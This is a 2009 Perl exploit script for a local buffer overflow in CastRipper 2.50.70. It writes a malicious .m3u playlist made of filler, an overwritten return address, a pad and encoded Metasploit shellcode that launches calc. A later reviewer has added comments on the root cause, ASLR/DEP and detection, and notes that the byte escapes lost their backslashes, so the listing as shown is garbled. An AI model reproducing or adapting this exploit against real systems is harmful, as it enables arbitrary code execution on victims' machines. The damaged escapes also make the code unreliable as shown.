
castripperm3u-overflow.txt

Posted on 13 May 2009

#!/usr/bin/perl
#[+]--------------------------------------------------------------------------------------[+]#
# CastRipper 2.50.70 (.m3u) Local buffer Overflow Exploit
# By [0]x80->[H]4x²0r
# hashteck[at]Gmail[dot]com
# From Morocco
#[+]--------------------------------------------------------------------------------------[+]#
# program  : CastRipper
# version  : 2.50.70
# download : http://www.mini-stream.net/castripper/
#[+]--------------------------------------------------------------------------------------[+]#
# Tested Under Win$hit Vista Pro
# After launching the sploit just drag&drop the .m3u file in the Ripper , Enjoy ;)
#
# NOTE : if you want to use it under an other version of Win32 use jmpfind.exe
# (available on the net) to find a matching address with which you'll overwrite your EIP .
#[+]--------------------------------------------------------------------------------------[+]#
##################################### Proud to be Moroccan ###################################
#
# Reviewer summary: this script only builds a file. It concatenates four strings and
# appends them to Exploit.m3u in the current directory; it never talks to the target
# program itself. Per the author's layout comment further down, the four parts are filler,
# a value meant to land on the saved return address (EIP), a short pad, and a payload
# that the author's generator comment describes as win32_exec with CMD=calc.
#
# NOTE(review): in this copy every string literal reads "x41", "xF8x03..." with no
# backslash, so Perl treats them as plain text rather than byte escapes. Presumably the
# backslashes were lost when the page was extracted; the listing is kept as found.
#
# Defensive reading:
#  - Root cause is presumably an unbounded copy of a playlist entry into a fixed-size
#    stack buffer in CastRipper 2.50.70; the vendor-side fix is a length check on each
#    entry before it is copied. Confirm against the vendor's advisory.
#  - The return address is a hard-coded module address, which the author's own note says
#    is only valid on the tested Windows build. Randomised module bases (ASLR) invalidate
#    such constants, and non-executable stacks (DEP/NX) block code that runs from the
#    overwritten buffer. Whether this application opts in to either is not shown here.
#  - Detection: a .m3u whose single record is well over 17 KB with no line break, a long
#    run of one repeated byte, and non-printable data is anomalous, since playlist entries
#    are normally short paths or URLs.

# Filler: 17379 repetitions of one character, sized by the author to reach the saved
# return address (offset is the author's figure for the tested build).
$junk="x41" x 17379;
$eip="xF8x03xB1x76"; # 0x76B103F8 jmp ESP - Kernel32.dll
# Pad labelled "nops" by the author. The value is 0x46 rather than the usual 0x90, so a
# signature that looks only for 0x90 sleds would not match this file.
$nops="x46" x 10;
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Ten 16-byte rows, matching the Size=160 stated above. The content is encoded, so the
# "calc" command is not visible as plain text in the file.
$shell = "x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x88".
"xd3x37xccx83xebxfcxe2xf4x74x3bx73xccx88xd3xbcx89".
"xb4x58x4bxc9xf0xd2xd8x47xc7xcbxbcx93xa8xd2xdcx85".
"x03xe7xbcxcdx66xe2xf7x55x24x57xf7xb8x8fx12xfdxc1".
"x89x11xdcx38xb3x87x13xc8xfdx36xbcx93xacxd2xdcxaa".
"x03xdfx7cx47xd7xcfx36x27x03xcfxbcxcdx63x5ax6bxe8".
"x8cx10x06x0cxecx58x77xfcx0dx13x4fxc0x03x93x3bx47".
"xf8xcfx9ax47xe0xdbxdcxc5x03x53x87xccx88xd3xbcxa4".
"xb4x8cx06x3axe8x85xbex34x0bx13x4cx9cxe0x23xbdxc8".
"xd7xbbxafx32x02xddx60x33x6fxb0x56xa0xebxd3x37xcc";
# | --------------Junk-------------|-EIP-|----Nops----|-----------Shellcode----------|
# NOTE(review): two-argument open on a bareword handle, in append mode (">>"), with no
# check of the return value. If the open fails, the script still prints the "Done" line.
open(m3u,">>Exploit.m3u");
# Output is one record with no trailing newline and no #EXTM3U header.
print m3u $junk.$eip.$nops.$shell;
print "[+] Done !! [+]";
close(m3u);

 
